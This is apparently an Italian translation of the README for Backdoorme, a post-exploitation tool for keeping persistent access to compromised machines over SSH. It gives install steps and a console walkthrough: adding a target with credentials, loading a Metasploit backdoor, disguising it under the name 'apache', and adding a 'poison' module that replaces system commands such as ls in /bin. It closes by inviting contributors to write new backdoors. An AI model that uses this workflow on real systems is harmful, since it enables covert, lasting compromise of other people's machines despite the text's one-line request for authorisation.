
Potente strumento per backdoor automatico
Strumenti come metasploit sono ottimi per sfruttare i computer, ma cosa succede dopo aver ottenuto l'accesso a un computer? Backdoorme risponde a questa domanda scatenando una serie di backdoor per stabilire una persistenza per lunghi periodi di tempo.
Una volta stabilita una connessione SSH con il target, i punti di forza di Backdoorme possono concretizzarsi. Sfortunatamente, Backdoorme non è uno strumento per ottenere l'accesso root - serve solo a mantenere quell'accesso una volta ottenuto.
Si prega di utilizzare Backdoorme solo con autorizzazione esplicita - per favore non hackerare senza chiedere.
Backdoorme è suddiviso in due parti: backdoor e moduli.
Le backdoor sono piccoli frammenti di codice che ascoltano su una porta e reindirizzano a un interprete, come bash. Ci sono molte backdoor scritte in vari linguaggi per offrire varietà.
I moduli rendono le backdoor più potenti eseguendole più spesso, ad esempio ogni pochi minuti o all'avvio del computer. Questo aiuta a stabilire la persistenza.
Dimostrazione:
Per avviare backdoorme, assicurati innanzitutto di avere le dipendenze richieste.
Per Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Per Python 2.7:
$ sudo python dependencies.py
Avvio di backdoorme:
$ python master.py
Per aggiungere un target:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 impostato!
>>
Per utilizzare una backdoor, basta usare la parola chiave "use".
>> use shell/metasploit
+ Utilizzo del target corrente 1.
+ Utilizzo della backdoor Metasploit...
(msf) >>
Da lì, puoi impostare le opzioni relative alla backdoor. Digita "show options" o "help" per vedere un elenco di parametri che possono essere configurati. Per impostare un'opzione, basta usare la parola chiave "set".
(msf) >> show options
Opzioni della backdoor:
Opzione Valore Descrizione Richiesto
------ ----- ----------- --------
name initd nome della backdoor Falso
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Opzioni della backdoor:
Opzione Valore Descrizione Richiesto
------ ----- ----------- --------
name apache nome della backdoor Falso
...
Come in metasploit, le backdoor sono organizzate per categoria.
Ogni backdoor ha la capacità di avere moduli aggiuntivi applicati per renderla più potente. Per aggiungere un modulo, basta usare la parola chiave "add".
(msf) >> add poison
+ Modulo Poison aggiunto
Ogni modulo ha parametri aggiuntivi che possono essere personalizzati, e se si esegue di nuovo "help", puoi vedere o impostare eventuali opzioni aggiuntive.
(msf) >> help
...
Opzioni del modulo Poison:
Opzione Valore Descrizione Richiesto
------ ----- ----------- --------
name ls nome del comando da avvelenare Falso
location /bin dove mettere i file avvelenati Falso
I moduli attualmente abilitati includono:
Backdoorme supporta più target diversi contemporaneamente, organizzati per numero quando vengono inseriti. Il nucleo mantiene un target "corrente", al quale verranno assegnate per impostazione predefinita tutte le nuove backdoor. Per cambiare target manualmente, basta aggiungere il numero del target dopo il comando: "use metasploit 2" preparerà la backdoor metasploit per il secondo target. Esegui "list" per vedere l'elenco dei target correnti, se una connessione è aperta o chiusa, e quali backdoor e moduli sono disponibili.
Backdoorme è ancora in fase iniziale! Sentiti libero di contribuire al progetto: basta forkarlo, apportare le tue modifiche e inviare una pull request. Hai un'idea per una backdoor fantastica o qualcosa che potremmo migliorare? Apri un issue e lo aggiungeremo al più presto! Inviaci un'email a [email protected] per qualsiasi domanda.
Se desideri aggiungere una tua backdoor, segui le istruzioni nel file backdoorme/backdoors/template.py.
Se desideri aggiungere un tuo modulo, segui le istruzioni nel file backdoorme/modules/template.py.
Promemoria per sviluppatori: